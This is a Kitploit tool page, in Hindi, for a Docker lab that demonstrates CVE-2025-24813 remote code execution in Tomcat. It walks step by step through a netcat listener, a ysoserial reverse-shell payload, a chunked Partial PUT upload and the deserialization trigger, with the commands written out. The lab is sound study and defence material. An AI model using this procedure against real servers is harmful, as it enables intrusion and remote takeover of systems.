Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24813 — सेशन एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/beyond-devsecops/cve-2025-24813
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणलर्निंग और शिक्षारिमोट एक्सेस टूलबाइनरी शोषणलैब और अभ्यास
GitHubbeyond-devsecops/cve-2025-24813

CVE-2025-24813

सेशन एक्सप्लॉइट

41 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

tags: [tomcat, cve-2025-24813, java, rce, reverse-shell, lab] title: 🧪 CVE-2025-24813 Tomcat RCE प्रयोगशाला (Docker + ysoserial)

🧪 CVE-2025-24813 Tomcat RCE प्रयोगशाला (Docker + ysoserial)

यह प्रयोगशाला एक Tomcat-होस्टेड ऐप में असुरक्षित Java डिसीरियलाइज़ेशन के माध्यम से रिमोट कोड निष्पादन का प्रदर्शन करती है, जो क्रमबद्ध सत्र फ़ाइलों को प्रोसेस करता है। पूरा वातावरण Docker में चलता है, जिसमें Partial PUT अनुरोध के माध्यम से एक क्राफ्टेड रिवर्स शेल पेलोड वितरित किया जाता है।


📁 निर्देशिका लेआउट

root@kitploit:~
.
├── 0-run-tomcat.sh        # Build + run vulnerable Tomcat container
├── 1-generate-revshell.sh # Start Netcat reverse shell listener
├── 2-generate-payload.sh  # Generate ysoserial reverse shell payload
├── 3-upload-file.sh       # Upload serialized payload via Partial PUT
├── 4-exploit.sh           # Trigger deserialization endpoint
├── readme.md              # This file
├── source.sh              # Sets CALLBACK_IP, LISTENER_PORT, etc
├── dummy-app/
│   ├── src/
│   │   └── main/java/com/example/DeserializeServlet.java
│   ├── pom.xml
│   └── Dockerfile

⚙️ पूर्वापेक्षाएँ

Java और Netcat स्थापित करें:

root@kitploit:~
brew install openjdk netcat

सुनिश्चित करें कि आप JDK 11+ का उपयोग कर रहे हैं और --add-opens के माध्यम से असुरक्षित मॉड्यूल एक्सेस की अनुमति दें।


🧨 एक्सप्लॉइट प्रवाह

  1. 🛠 असुरक्षित Tomcat को बनाएँ और चलाएँ
  2. 🐚 रिवर्स शेल लिसनर प्रारंभ करें
  3. 💣 ysoserial पेलोड (CommonsBeanutils1) उत्पन्न करें
  4. 📤 HTTP Partial PUT का उपयोग करके पेलोड अपलोड करें
  5. 🎯 डिसीरियलाइज़ेशन ट्रिगर करें और शेल प्राप्त करें

🧪 उपयोग

1. असुरक्षित Tomcat बनाएँ और चलाएँ

root@kitploit:~
bash 0-run-tomcat.sh

2. पर्यावरण चर सेट करें

इस प्रकार एक source.sh फ़ाइल बनाएँ:

root@kitploit:~
export CALLBACK_IP="your.lan.ip"
export LISTENER_PORT=4444
export PAYLOAD_FILE="rev_shell.ser"
export TARGET_URL="http://localhost:8080/xxx-api/gopan.session"
export CHUNK_SIZE=100

फिर इसे स्रोत करें:

root@kitploit:~
source source.sh

3. रिवर्स शेल लिसनर प्रारंभ करें

एक अलग टर्मिनल में:

root@kitploit:~
bash 1-generate-revshell.sh

यह चलाएगा:

root@kitploit:~
nc -lnvp 4444

4. पेलोड उत्पन्न करें

root@kitploit:~
bash 2-generate-payload.sh

यह:

  • यदि आवश्यक हो तो ysoserial.jar डाउनलोड करेगा
  • रिवर्स शेल के साथ CommonsBeanutils1 पेलोड उत्पन्न करेगा
  • इसे rev_shell.ser के रूप में सहेजेगा

5. पेलोड अपलोड करें

root@kitploit:~
bash 3-upload-file.sh

यह स्क्रिप्ट Content-Range हेडर का उपयोग करके HTTP Partial PUT अपलोड को चंक्स में करती है।


6. एक्सप्लॉइट ट्रिगर करें

root@kitploit:~
bash 4-exploit.sh

यह हिट करता है:

root@kitploit:~
http://localhost:8080/xxx-api/profile

जो अपलोड की गई फ़ाइल को डिसीरियलाइज़ करता है और पेलोड निष्पादित करता है।

✅ आपको Netcat टर्मिनल में एक रिवर्स शेल मिलेगा!


🔍 डीबगिंग

कंटेनर के अंदर:

root@kitploit:~
docker exec -it vulnerable-tomcat bash
cd /usr/local/tomcat/webapps/xxx-api/
ls -l

यदि सुरक्षित पेलोड के साथ परीक्षण कर रहे हैं तो जाँचें कि फ़ाइल /tmp/beanutils-worked मौजूद है या नहीं।


💡 नोट्स

  • पेलोड्स को Java 11+ में मॉड्यूल प्रतिबंधों को बायपास करने के लिए --add-opens की आवश्यकता होती है
  • यदि /bin/bash उपलब्ध नहीं है तो रिवर्स शेल मौन रूप से विफल हो सकता है (/bin/sh आज़माएँ)
  • आप touch /tmp/rce-worked के साथ कोड निष्पादन का सुरक्षित रूप से परीक्षण कर सकते हैं

🧱 आधारित

  • frohoff/ysoserial
  • Apache Tomcat 9.x
  • Java डिसीरियलाइज़ेशन एक्सप्लॉइट चेन्स (CommonsBeanutils1)

टूल डाउनलोड करें